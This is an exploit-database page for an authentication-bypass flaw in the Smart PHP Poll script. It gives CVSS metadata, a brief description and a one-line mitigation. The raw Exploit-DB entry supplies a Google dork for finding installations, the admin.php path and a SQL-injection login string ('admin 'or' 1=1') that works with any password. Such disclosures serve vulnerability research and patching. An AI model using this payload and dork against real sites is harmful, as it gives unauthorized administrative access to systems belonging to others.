header-logo
Suggest Exploit
vendor:
Smart PHP Poll
by:
Mr.tro0oqy
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Smart PHP Poll
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Smart PHP Poll Auth Bypass Vulnerability

A vulnerability in Smart PHP Poll allows an attacker to bypass authentication by entering 'admin' or '1=1' as the username and any value as the password. This vulnerability is due to the application not properly validating user input.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in authentication.
Source

Exploit-DB raw data:

# Exploit Title: Smart PHP Poll Auth Bypass Vulnerability
# Google Dork: Copyright � Smart PHP Poll. All Rights Reserved.
# Exploit Author: Mr.tro0oqy (from Yemen)
# Email : uxxd@hotmail.com
# Download Script :http://www.scriptsez.net/download/download.php?action=download&p=smart_php_poll.zip&ns=1

go to www.target.com/path/admin.php

username = admin 'or' 1=1

password = anything

Navigation

Suggest Exploit

Services By CQR